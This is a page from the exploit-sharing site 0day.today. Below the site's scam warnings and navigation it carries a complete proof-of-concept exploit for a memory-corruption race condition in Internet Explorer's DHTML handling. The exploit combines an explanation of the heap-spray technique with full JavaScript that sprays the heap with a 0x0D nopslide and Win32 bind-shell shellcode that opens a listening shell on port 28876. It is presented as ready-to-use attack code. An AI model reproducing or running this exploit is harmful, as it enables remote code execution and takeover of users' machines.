0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Internet Explorer DHTML Object Memory Corruption Exploit
=========================================================== MS Internet Explorer DHTML Object Memory Corruption Exploit =========================================================== <HTML><!-- ________________________________________________________________________________ ,sSSSs, Ss, Internet Exploiter 2 v0.1 SS" `YS' '*Ss. MSIE R6025 Multithreading issue PoC exploit iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever. YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever `"YSSP" sSS <skylined@edup.tudelft.nl> ________________________________________________________________________________ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2, 1991 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. A copy of the GNU General Public License can be found at: http://www.gnu.org/licenses/gpl.html or you can write to: Free Software Foundation, Inc. 59 Temple Place - Suite 330 Boston, MA 02111-1307 USA. The vulnerability: There is a race condition when using appendChild to append an element in one window to an element in another. A "dirty" read can be exploited to gain control over the process. The control can be gained because of this code: MSHTML.DLL @ 0x635F6074 (win2ksp4en) MOV EAX, DWORD PTR [ESP+4] ; EAX = Some pointer to the heap for mshtml MOV EAX, DWORD PTR [EAX] ; EAX = "dirty" value from heap JMP NEAR DWORD PTR [EAX+8] ; Jmp to memory pointed to by "dirty" value This is how we exploit it: - To get some control over the "dirty" value we try to "spray" the heap for mshtml with the value we want it to read. This is done with creatComment()s that contain a string full of our value. We want to spray effectve and fast, so we use as big a string as possible. If we use a string over 512 bytes long, mshtml will write a pointer to the string instead of the string itself. - To jump to the right address, we have to make sure that the "dirty" value points to a pointer that in turn points to the address we want to jump to. The first part of the exploit will provide for all this in creating a number of dwords around 0x0D0D0D0D that all point to 0x0D0D0D0D. So if we "spray" the heap for mshtml with 0x0D0D0D0D, this is what will happen: MSHTML.DLL @ 0x635F6074 (win2ksp4en) MOV EAX, DWORD PTR [ESP+4] ; EAX = Some pointer to the heap fot mshtml MOV EAX, DWORD PTR [EAX] ; EAX = 0x0D0D0D0D JMP NEAR DWORD PTR [EAX+8] ; JMP [0x0D0D0D15] = JMP 0x0D0D0D0D HEAP @ 0x0D0D0D0D OR EAX, 0x0D0D0D0D OR EAX, 0x0D0D0D0D OR EAX, 0x0D0D0D0D ...nopslide... shellcode This has proven to work quite reliable. Allthough testing showed that there is a chance we do not control the "dirty" value. In this case, the "dirty" value seems to be 0x11CF03f9 a lot of the time, so we make sure we cover that address with the '0D' nopslide-landingzone too. --> <SCRIPT id="SkyLined" language="javascript"> sMSHTML_heap_spray = unescape("%u0D0D%u0D0D"); for (i=0; i<7; i++) // 512 bytes sMSHTML_heap_spray += sMSHTML_heap_spray; try { // We need to have an element in another window, so we try to create // one in the window that opened us. This will most likely fail // the first time because of XSS restrictions. In that case we open // this page in a new window and try again from there. exploit(opener.document.createComment(sMSHTML_heap_spray)); } catch(e) { // both open() and showHelp() work with this window.open(document.location.href); } function exploit(parent_element) { // cosmetics, this window will DIE, so we move it out of view. opener.focus(); window.moveTo(100000, 100000); iHeap_fill_to_address = 0x12000000; sHeap_return_address = unescape("%u0D0D%u0D0D"); // 4 nops because the 0x0D slide has 5 byte instructions. sShellcode = unescape("%u3737%u3737" + // Win32 bindshell (port 28876, '\0' free, looping). Thanks to // HDM and others for inspiration and borrowed code. Source: // www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c "%u43eb"+"%u5756"+"%u458b"+"%u8b3c"+"%u0554"+"%u0178"+"%u52ea" + "%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf" + "%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b" + "%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" + "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850" + "%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff" + "%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22" + "%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6" + "%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe" + "%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031" + "%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56" + "%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964" + "%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" + "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343" + "%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031" + "%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b" + "%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); // We are going to create a large block the will contain: // [heap header][nopslide...........................][shellcode] // by creating an array with a number of large strings that contain // the nopslide and the shellcode. We will do this in such a way that // one heap block is allocated for every string (by making it at least // 0x80000 bytes) and try to use every byte of the heap block by making // the nopslide fill the area between the heap header and shellcode // precisely. // Size of the header of heap blocks in MSIE in bytes: iHeap_header_size = 0x38; // Actually it's 0x24, but this value works better // Size of the blocks we want to create in bytes: iHeap_block_size = 0x400000; // Size of the shellcode in bytes: iShellcode_size = sShellcode.length * 2; // (convert dwords to bytes) // From this we can calculate the size of the nopslide in bytes: iNopslide_size = iHeap_block_size - (iHeap_header_size + iShellcode_size); // The quickest way to create large blocks of memory is doubling their // size untill they are big enough (or too big, in which case we cut // them back to size.) sNopslide = sHeap_return_address; while (sNopslide.length*2<iNopslide_size) sNopslide+=sNopslide; sNopslide = sNopslide.substring(0, iNopslide_size/2); // And now we can combine the nopslide and shellcode to create the heap // blocks, we'll create enough to make sure we've got one at the // desired return address: If we could calculate where the first one // will be allocated, we could create exactly enough blocks, for now // we assume they won't start under 0x400000 so we make sure we // create enough for that value. iHeap_block_count = (iHeap_fill_to_address-0x400000) / iHeap_block_size; memory = new Array(); for (i=0;i<iHeap_block_count;i++) memory[i] = sNopslide + sShellcode; sMSHTML_heap_spray = sNopslide.substring(0, 0x100); // 0x100 dwords = 512 bytez for(i=0;i<1024;i++) try { parent_element.appendChild(document.createComment(sMSHTML_heap_spray)); } catch (e) { } } </SCRIPT> </HTML> # 0day.today [2024-12-24] #